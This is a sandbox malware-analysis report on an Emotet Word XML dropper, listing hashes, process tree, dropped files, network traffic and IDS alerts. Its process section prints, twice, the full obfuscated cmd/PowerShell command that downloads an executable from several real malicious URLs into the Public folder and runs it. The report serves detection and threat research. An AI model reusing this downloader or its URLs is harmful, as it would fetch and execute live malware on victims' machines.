analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

object245.application%2fxml

Full analysis: https://app.any.run/tasks/f6851177-0edb-4880-9c2e-7104a8e6d012
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2019, 22:36:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
feodo
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

047CCA99D10D4EFDB7F6283E82843E6D

SHA1:

337EC60C8B84CE7FD5C6723D97BDBF1A95FAD842

SHA256:

EB24104819BEDF325326D772237AB87123274F0452520C82D67D24F1CD2DB800

SSDEEP:

6144:6v/ybBPDDMkqWqs6vOtX0OEDzYUTE7yZRVUi8E:4/GJsOtX0BzEmZRGi7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2676)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2676)
    • Application was dropped or rewritten from another process

      • 486.exe (PID: 2744)
      • 486.exe (PID: 3064)
      • wabmetagen.exe (PID: 2260)
      • wabmetagen.exe (PID: 3344)
    • Executes PowerShell scripts

      • cmd.exe (PID: 4024)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2584)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3344)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2716)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2584)
      • 486.exe (PID: 2744)
    • Application launched itself

      • 486.exe (PID: 3064)
    • Creates files in the user directory

      • powershell.exe (PID: 2584)
    • Starts itself from another location

      • 486.exe (PID: 2744)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2676)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2676)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:17 16:24:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:17 16:24:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 15
WordDocumentDocumentPropertiesCharacters: 86
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 100
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (Binary data 96630 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00554C54
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00554C54
WordDocumentBodySectPRRsidRPr: 005241E0
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe no specs cmd.exe no specs powershell.exe 486.exe no specs 486.exe wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2716"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\7b17bdec-4084-46c5-bf36-db58b3a16b9b.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2676"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7b17bdec-4084-46c5-bf36-db58b3a16b9b.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4024"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $HandmadeCottonChips13='EXE70';$transition33=new-object Net.WebClient;$Identity75='http://fleetstreetstudios.co.za/LcX6_wx2gkPUh@http://pentick.space/8EVxz_Uvsd_4@http://www.ipbempreende.com.br/d2gp7Tj_xfPR2@http://plottermais.com/geYz_l5Du@http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN'.Split('@');$payment33='incentivize40';$HomeLoanAccount64 = '486';$collaboration49='Idaho42';$protocol23=$env:public+'\'+$HomeLoanAccount64+'.exe';foreach($core43 in $Identity75){try{$transition33.DownloadFile($core43, $protocol23);$CanadianDollar73='Utah94';If ((Get-Item $protocol23).length -ge 80000) {Invoke-Item $protocol23;$InvestmentAccount27='wireless54';break;}}catch{}}$Avon62='Granite93'; C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2584powershell $HandmadeCottonChips13='EXE70';$transition33=new-object Net.WebClient;$Identity75='http://fleetstreetstudios.co.za/LcX6_wx2gkPUh@http://pentick.space/8EVxz_Uvsd_4@http://www.ipbempreende.com.br/d2gp7Tj_xfPR2@http://plottermais.com/geYz_l5Du@http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN'.Split('@');$payment33='incentivize40';$HomeLoanAccount64 = '486';$collaboration49='Idaho42';$protocol23=$env:public+'\'+$HomeLoanAccount64+'.exe';foreach($core43 in $Identity75){try{$transition33.DownloadFile($core43, $protocol23);$CanadianDollar73='Utah94';If ((Get-Item $protocol23).length -ge 80000) {Invoke-Item $protocol23;$InvestmentAccount27='wireless54';break;}}catch{}}$Avon62='Granite93'; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3064"C:\Users\Public\486.exe" C:\Users\Public\486.exepowershell.exe
User:
admin
Company:
Mozilla, Netscape
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.4: 2003062408
2744"C:\Users\Public\486.exe"C:\Users\Public\486.exe
486.exe
User:
admin
Company:
Mozilla, Netscape
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.4: 2003062408
2260"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe486.exe
User:
admin
Company:
Mozilla, Netscape
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.4: 2003062408
3344"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Mozilla, Netscape
Integrity Level:
MEDIUM
Version:
1.4: 2003062408
Total events
1 778
Read events
1 364
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8AD1.tmp.cvr
MD5:
SHA256:
2676WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B70D57F.jpg
MD5:
SHA256:
2584powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BMJME4ENAGBY431SPVMB.temp
MD5:
SHA256:
2584powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2676WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$17bdec-4084-46c5-bf36-db58b3a16b9b.xmlpgc
MD5:97FC8A33B6022910729DF3F7986F1518
SHA256:CC7D263650D3BCE38282A725FF850FCF887EBF188B4713A333208623484D4DAB
2676WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:41379A924454D4DBF21EC8153C20C10F
SHA256:0C15CF2B44D7D8698623838B4214E135CD0F5B33F8FE0D860DBE04AB98A65B80
2584powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199679.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2584powershell.exeC:\Users\Public\486.exeexecutable
MD5:5C55696D5718AFE8453832950518EE57
SHA256:CFDDB0D4391054ADB4D130A3239EA1A30E1CBC8044810DD89BAF31E005916304
2744486.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:5C55696D5718AFE8453832950518EE57
SHA256:CFDDB0D4391054ADB4D130A3239EA1A30E1CBC8044810DD89BAF31E005916304
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2584
powershell.exe
GET
200
154.0.164.160:80
http://fleetstreetstudios.co.za/LcX6_wx2gkPUh/
ZA
executable
170 Kb
malicious
2584
powershell.exe
GET
301
154.0.164.160:80
http://fleetstreetstudios.co.za/LcX6_wx2gkPUh
ZA
html
254 b
malicious
3344
wabmetagen.exe
GET
190.138.221.70:53
http://190.138.221.70:53/
AR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3344
wabmetagen.exe
190.138.221.70:53
Telecom Argentina S.A.
AR
malicious
2584
powershell.exe
154.0.164.160:80
fleetstreetstudios.co.za
Afrihost
ZA
suspicious

DNS requests

Domain
IP
Reputation
fleetstreetstudios.co.za
  • 154.0.164.160
malicious

Threats

PID
Process
Class
Message
2584
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2584
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2584
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3344
wabmetagen.exe
A Network Trojan was detected
ET TROJAN HTTP GET Request on port 53 - Very Likely Hostile
3344
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3344
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
No debug info